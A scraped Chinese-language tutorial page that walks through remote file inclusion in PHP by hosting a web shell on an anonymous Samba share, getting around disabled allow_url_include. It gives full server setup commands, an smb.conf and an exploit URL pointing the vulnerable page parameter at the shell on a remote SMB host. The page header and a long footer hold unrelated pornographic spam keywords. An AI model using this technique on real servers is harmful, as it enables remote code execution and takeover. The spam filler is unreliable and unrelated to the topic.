婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > 使用SMB共享來繞過php遠程文件包含的限制執行RFI的利用

使用SMB共享來繞過php遠程文件包含的限制執行RFI的利用

熱門標簽:咸寧銷售電銷機器人系統 余姚電話機器人 電銷機器人問門薩維品牌my 400電話蘭州申請請 外呼系統能給企業帶來哪些好處 百度地圖怎樣標注圖標 百度地圖標注偏差 廣東廣州在怎么申請400電話 開發地圖標注類網站

在這篇博文中,我將為大家演示如何利用PHP應用中的遠程文件包含漏洞的技術。我們將繞過php遠程文件包含的限制,并執行RFI的利用,即使PHP環境被配置為不包含來自遠程HTTP/FTP URL的文件。

PHP 和 SMB 共享文件訪問

在PHP配置文件中,“allow_url_include”wrapper默認設置為“Off”,指示PHP不加載遠程HTTP或FTP URL,從而防止遠程文件包含攻擊。但是,即使“allow_url_include”和“allow_url_fopen”都設置為“Off”,PHP也不會阻止加載SMB URL。而這就極有可能被濫用來從SMB共享加載遠程托管的PHP Web shell。

攻擊場景概述

當易受攻擊的PHP應用程序代碼嘗試從受攻擊者控制的SMB共享加載PHP Web shell時,SMB共享應允許訪問該文件。攻擊者需要在其上配置具有匿名瀏覽訪問權限的SMB服務器。因此,一旦易受攻擊的應用程序嘗試從SMB共享訪問PHP Web shell,SMB服務器將不會要求任何的憑據,易受攻擊的應用程序將包含Web shell的PHP代碼。

首先,我重新配置了PHP環境,并在php.in i文件中禁用了“allow-url-fopen”和“allow-url-include”。之后,配置了具有匿名瀏覽訪問的SMB服務器。一旦SMB共享準備就緒,我們就可以利用易受攻擊的應用程序了。

PHP 環境設置

將托管易受攻擊代碼的機器上的“allow_url_fopen”和“allow_url_include”設置為“Off”

以下是版本為“5.5.11”的PHP當前配置截圖:

 

在繼續下一步之前,讓我們確保當我們嘗試訪問HTTP上托管的Web shell時,PHP代碼不允許遠程文件包含。

 

可以看到,當我試圖從遠程主機包含PHP Web shell時,應用程序拋出錯誤并且沒有包含遠程文件。

使用匿名瀏覽訪問配置 Samba 服務器(Linux 機器)
使用以下命令安裝Samba服務器:

apt-get install samba創建SMB共享目錄:

mkdir /var/www/html/pub/

 

配置新創建的SMB共享目錄的權限:

chmod 0555 /var/www/html/pub/
chown -R nobody:nogroup /var/www/html/pub/

 

運行以下命令,刪除SAMBA服務器配置文件的默認內容。

echo > /etc/samba/smb.conf將以下內容添加到/etc/samba/smb.conf文件。

[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios name = indishell-lab
security = user
map to guest = bad user
name resolve order = bcast host
dns proxy = no
bind interfaces only = yes
[ica]
path = /var/www/html/pub
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555

force user = nobody現在,重啟SAMBA服務器以使配置文件/etc/samba/smb.conf中的新配置生效。

service smbd restart成功重啟SAMBA服務器后,嘗試訪問SMB共享并確保SAMBA服務器不要求提供憑據。

在本例中,SAMBA服務器IP為192.168.0.3,我需要訪問Windows文件瀏覽器中的SMB共享,如下:

\\192.168.0.3\&;

 

在 SMB 共享中托管 PHP Web shell

太棒了!可以訪問smb共享,并顯示目錄“ica”存在。

 

現在,將PHP shell托管在目錄“/var/www/html/pub”中,該目錄為smb共享目錄“ica”。

成功托管PHP shell后,我們使用Windows文件瀏覽器訪問SMB共享目錄“ica”。

\\192.168.0.3\ica\可以看到php shell存在于smb共享目錄中,在本例中為box.php文件。

 

利用文件包含易受攻擊的參數
讓我們使用這個PHP shell SMB鏈接,以及易受攻擊的php代碼瀏覽它。

http://vulnerable_application/page.php?page=\\192.168.0.3\ica\box.phpPHP易受攻擊的代碼從SMB共享中獲取了web shell,并在應用程序服務器上執行了代碼\m/。我們已經繞過了php遠程文件包含的限制,并包含了托管在遠程主機上的Web shell。

 

總結

以上所述是小編給大家介紹的使用SMB共享來繞過php遠程文件包含的限制執行RFI的利用,希望對大家有所幫助,如果大家有任何疑問請給我留言,小編會及時回復大家的。在此也非常感謝大家對腳本之家網站的支持!

您可能感興趣的文章:
  • php文件包含目錄配置open_basedir的使用與性能詳解
  • PHP中你應該知道的require()文件包含的正確用法
  • php 偽造本地文件包含漏洞的代碼
  • PHP 網絡開發詳解之遠程文件包含漏洞
  • php文件包含的幾種方式總結

標簽:衡陽 銅陵 十堰 巴彥淖爾 臨沂 重慶 鷹潭 麗江

巨人網絡通訊聲明:本文標題《使用SMB共享來繞過php遠程文件包含的限制執行RFI的利用》,本文關鍵詞  使用,SMB,共享,來,繞過,php,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《使用SMB共享來繞過php遠程文件包含的限制執行RFI的利用》相關的同類信息!
  • 本頁收集關于使用SMB共享來繞過php遠程文件包含的限制執行RFI的利用的相關信息資訊供網民參考!
  • 推薦文章
    婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av
    视频一区国产视频| 亚洲欧美一区二区三区久本道91| 精品国精品自拍自在线| 亚洲欧美一区二区视频| 秋霞影院一区二区| 91福利区一区二区三区| 国产精品久久福利| 成人小视频在线| 欧美精品一区在线观看| 99久久免费精品高清特色大片| 欧美精品一区二区三区视频| 国产高清在线精品| 中文字幕一区二区在线播放| 91亚洲国产成人精品一区二区三| 亚洲人吸女人奶水| 在线不卡中文字幕| 国产精品一区一区三区| 亚洲欧美日韩国产综合| 久久精品国产精品亚洲红杏| 91麻豆免费在线观看| 日韩午夜在线观看| 国产一区二区三区免费观看| 国产精品高清亚洲| 678五月天丁香亚洲综合网| 玖玖九九国产精品| 1024亚洲合集| 日韩欧美黄色影院| 99r国产精品| 日韩黄色在线观看| 国产精品人妖ts系列视频| 欧美综合欧美视频| 国产一区二区成人久久免费影院 | 亚洲午夜视频在线观看| 欧美一区二区三区四区在线观看 | 亚洲夂夂婷婷色拍ww47| 精品少妇一区二区三区在线播放| 国产精品亚洲一区二区三区妖精 | aa级大片欧美| 久久精品久久综合| 亚洲码国产岛国毛片在线| 欧美二区在线观看| 成人国产精品免费观看视频| 天天综合网 天天综合色| 91免费看片在线观看| 经典三级视频一区| 国产米奇在线777精品观看| 99re这里只有精品首页| 91精品午夜视频| 久久先锋影音av鲁色资源| 国产亚洲精品资源在线26u| 中文字幕av一区 二区| 亚洲bt欧美bt精品| 国产精品888| 日本福利一区二区| 精品国产污污免费网站入口| 日本一区二区三级电影在线观看| 国产精品美女久久久久久2018| 成人欧美一区二区三区视频网页| 亚洲精品国产a| 国内精品不卡在线| 日韩中文字幕不卡| 欧美日韩国产综合草草| 性欧美疯狂xxxxbbbb| 在线观看亚洲精品| 99久久99久久精品免费观看 | 国产做a爰片久久毛片| 99久久精品一区二区| 国产成人亚洲综合a∨婷婷图片| 人人精品人人爱| 丝袜亚洲另类欧美| 免费看日韩a级影片| 天天影视网天天综合色在线播放| 亚洲一区影音先锋| 亚洲美女视频在线观看| 亚洲综合精品自拍| 精品国产91乱码一区二区三区| 精品盗摄一区二区三区| 极品尤物av久久免费看| 国产日韩欧美在线一区| 国内成+人亚洲+欧美+综合在线| 偷拍一区二区三区| 日韩国产精品久久久| 美女任你摸久久| 国产精品1区2区3区| 国产成人精品三级麻豆| 成人av网站免费观看| 一本大道久久a久久精二百| 欧亚一区二区三区| 91精品国产日韩91久久久久久| 精品欧美乱码久久久久久| 国产片一区二区三区| 一区二区理论电影在线观看| 免费av网站大全久久| 国产91精品入口| 天堂午夜影视日韩欧美一区二区| 91网站最新网址| 久久成人18免费观看| 中文字幕亚洲一区二区va在线| 国产欧美一区二区精品久导航| 亚洲精品一区二区精华| 一片黄亚洲嫩模| 国产suv精品一区二区三区| 在线一区二区三区四区五区| 26uuu亚洲| 亚洲第一久久影院| 国产高清精品在线| 欧美人妇做爰xxxⅹ性高电影| 久久蜜桃一区二区| 亚洲另类在线制服丝袜| 韩国成人精品a∨在线观看| 在线这里只有精品| 亚洲图片欧美激情| 国产精品69久久久久水密桃| 91麻豆精品国产无毒不卡在线观看| 91在线观看高清| 香蕉久久夜色精品国产使用方法| 国产精品久久久爽爽爽麻豆色哟哟| 欧美一区二区三区人| 欧美三级三级三级爽爽爽| 经典三级在线一区| 日韩三级高清在线| 亚洲超碰97人人做人人爱| 成人看片黄a免费看在线| 日韩三级视频在线看| 日韩av一二三| 一本大道久久精品懂色aⅴ| 亚洲成人一区在线| 91麻豆免费观看| 国产精品欧美经典| 国产 欧美在线| 日韩一级完整毛片| 奇米888四色在线精品| 欧美人牲a欧美精品| 日韩高清不卡在线| 欧美日韩www| 欧美猛男超大videosgay| 国产精品亚洲一区二区三区在线 | 国产午夜精品美女毛片视频| 免费在线看一区| 日韩一区二区三区免费看| 五月天亚洲婷婷| 在线一区二区三区四区五区| 一区二区三区波多野结衣在线观看| 色综合天天天天做夜夜夜夜做| 国产精品国模大尺度视频| 成人高清视频免费观看| 中文字幕欧美三区| 成人黄色网址在线观看| 亚洲天堂精品视频| 91玉足脚交白嫩脚丫在线播放| 亚洲欧洲日韩av| 色菇凉天天综合网| 亚洲成a人v欧美综合天堂| 91精品国产高清一区二区三区蜜臀| 蜜桃视频一区二区三区| 精品国产一区二区三区四区四| 国内成+人亚洲+欧美+综合在线| 中文字幕免费不卡| 欧美伊人精品成人久久综合97 | 亚洲网友自拍偷拍| 欧美精品一级二级三级| 老色鬼精品视频在线观看播放| 国产亚洲精久久久久久| 99re成人精品视频| 日韩av中文在线观看| 亚洲国产成人在线| 欧美在线一二三| 国产一区二区三区精品视频| 亚洲人成伊人成综合网小说| 91麻豆精品国产91久久久久| 国产一区二区h| 亚洲国产欧美在线| 久久欧美中文字幕| 欧美视频一区二区三区四区 | 精品综合免费视频观看| 中文字幕在线视频一区| 欧美日韩大陆在线| 国产suv一区二区三区88区| 亚洲一卡二卡三卡四卡无卡久久| 久久综合九色综合97_久久久| 在线欧美日韩国产| 国产xxx精品视频大全| 日本vs亚洲vs韩国一区三区| 中文字幕综合网| 久久精品人人爽人人爽| 日本一区二区三区久久久久久久久不 | 91精品久久久久久久99蜜桃| 成人午夜激情片| 美女视频一区二区| 亚洲午夜久久久| 亚洲一区在线观看免费观看电影高清 | 国产亚洲1区2区3区| 制服丝袜日韩国产| 色先锋aa成人| 成+人+亚洲+综合天堂| 国产综合久久久久久鬼色 | 精品无码三级在线观看视频| 国产精品一区二区你懂的| 九九国产精品视频| 成+人+亚洲+综合天堂|